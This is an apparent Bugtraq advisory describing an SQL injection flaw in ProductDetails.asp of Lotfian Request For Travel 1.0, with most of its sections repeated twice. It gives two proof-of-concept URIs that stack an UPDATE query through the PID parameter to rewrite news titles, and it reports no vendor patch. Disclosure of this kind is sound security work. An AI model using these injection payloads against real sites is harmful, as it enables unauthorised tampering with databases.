Lotfian Request For Travel ProductDetails.ASP SQL Injection Vulnerability
BID:21536
Info
Lotfian Request For Travel ProductDetails.ASP SQL Injection Vulnerability
| Bugtraq ID: | 21536 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 11 2006 12:00AM |
| Updated: | Dec 11 2006 12:00AM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
lotfian Request For Travel 1.0 |
| Not Vulnerable: | |
Discussion
Lotfian Request For Travel ProductDetails.ASP SQL Injection Vulnerability
Request For Travel is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 1.0 is vulnerable; other versions may also be affected.
Request For Travel is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Lotfian Request For Travel ProductDetails.ASP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
Change all News titles to "kro" -
http://www.example.com/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
Change just the NewsId title to = "kro"
http://www.example.com/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
Change all News titles to "kro" -
http://www.example.com/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
Change just the NewsId title to = "kro"
http://www.example.com/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
Solution / Fix
Lotfian Request For Travel ProductDetails.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Lotfian Request For Travel ProductDetails.ASP SQL Injection Vulnerability
References:
References:
- Vendor Homepage (Lotfian)